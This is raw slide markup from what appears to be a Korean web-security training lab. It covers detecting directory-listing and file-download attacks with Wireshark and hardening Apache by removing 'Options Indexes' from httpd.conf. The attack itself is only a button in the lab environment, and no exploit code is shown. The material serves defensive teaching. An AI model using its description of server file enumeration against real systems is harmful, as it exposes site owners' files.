            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 바탕화면에 터미널 실행 한 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>setup</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marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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‘공격 실행’ 버튼 클릭 시 아래와 같이 완료 화면이 나오고 공격상태가 ‘공격 중’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 변경 됨</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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C388787-1421-40C6-BC12-4A4283F6EA22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect b="64502"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="1119716"/>
            <a:ext cx="5400040" cy="1141791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56C2B69C-6A44-44A1-AFDC-4AE974C8449F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="3012225"/>
            <a:ext cx="5400040" cy="1688973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2310283B-3394-4AE8-857F-F5DD29BA1D21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1089778" y="5238690"/>
            <a:ext cx="4221480" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F00B5B4F-4119-47C4-B6C9-22F040D5D2A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="458409"/>
            <a:ext cx="5400040" cy="1700022"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309796661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7013694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/Training/Unit/Web/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>취약점 직접 객체 참조 </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귀하의 웹페이지에서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웹서버의 구조와 파일 정보를 얻고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공격을 차단하여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강화하시오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wireshark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차단 방법을 위한 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/httpd/conf/</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httpd.conf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
        <p:nvSpPr>
          <p:cNvPr id="16" name="화살표: 오른쪽 15">
            <a:hlinkClick r:id="rId5"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9231D57A-B0FE-4BCA-AC10-981F24E1545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01458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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>탐지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>웹 서버에서 아이콘 클릭</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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 이용하여 패킷을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접속한 웹서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 들어오는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>http </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>webhack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/board</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 접속하는 정보를 가지고 있는 패킷을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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷에 오른쪽 마우스 클릭 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Follow TCP Stream </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>클릭 하여 패킷의 상세한 내용을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Follow TCP Stream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>정보에 웹서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>board</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>의 목록이 전송되는 것을 확인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>할수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74838464-D75F-4328-8BE0-A515C51D4B60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="915609"/>
            <a:ext cx="5400040" cy="1934083"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9B7B5A7-1EB3-4A88-B1AD-B7500CA1C089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="3869479"/>
            <a:ext cx="5400040" cy="2440305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EA99449-7710-4906-8AAB-011DAEEC6AB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291462" y="661501"/>
            <a:ext cx="5400040" cy="3080512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB0BCACF-74F0-44BD-BA67-DEA27C50BFE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248365" y="4088148"/>
            <a:ext cx="5400040" cy="228333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41879582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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>대응</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>   1. Directory Listing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 대한 공격을 차단 방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/httpd/conf/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 파일에서 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>모든 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Options Indexes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>FollowSymLinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -&gt; Options </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>FollowSymLinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변경</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/httpd/conf/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>웹 서버 설정 파일</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(Options Indexes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>FollowSymLinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉토리 지시자는 해당 디렉토리 이하의 모든 웹 문서를 웹 페이지에서 어떻게 제어 할 것인가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/httpd/conf/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>httpd.conf</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1435309"/>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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># service httpd restart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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{384E42CC-FD9B-4352-A253-E5405092D44F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="2572959"/>
            <a:ext cx="5400040" cy="1892300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3170A65-5E92-43BF-BC99-A93A603F9D55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="4490180"/>
            <a:ext cx="5400040" cy="1949831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C4BF35A-4E71-4B95-80EB-D9003ABFE653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="874788"/>
            <a:ext cx="5400040" cy="688975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60CDBFD6-F657-449E-B95E-8D13AAC277E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="1943396"/>
            <a:ext cx="5616792" cy="4545601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>터미널 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># check</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4CC2A1A-931B-4388-B083-9C3D272377EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6434974" y="2491316"/>
            <a:ext cx="5113020" cy="833755"/>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64334536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/Training/Unit/Web/3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>취약점 직접 객체 참조</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공격자는 현재 파일 다운로드에 대한 취약한 서버를 확인 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웹서버의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다운로드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게시물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Guest board/r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다운로드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75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>파일 다운로드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75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75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>취약점 공격을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>대응</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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0901548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98046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9836F1E8-B09C-4452-90B0-5B18362E287E}"/>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9AD810FA-42AA-4269-B82E-CB829D0E5B9B}"/>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12" name="타원 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{030C3FF1-B250-41AD-9B02-337842DFD5B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8251824" y="512714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2020</a:t>
            </a:r>
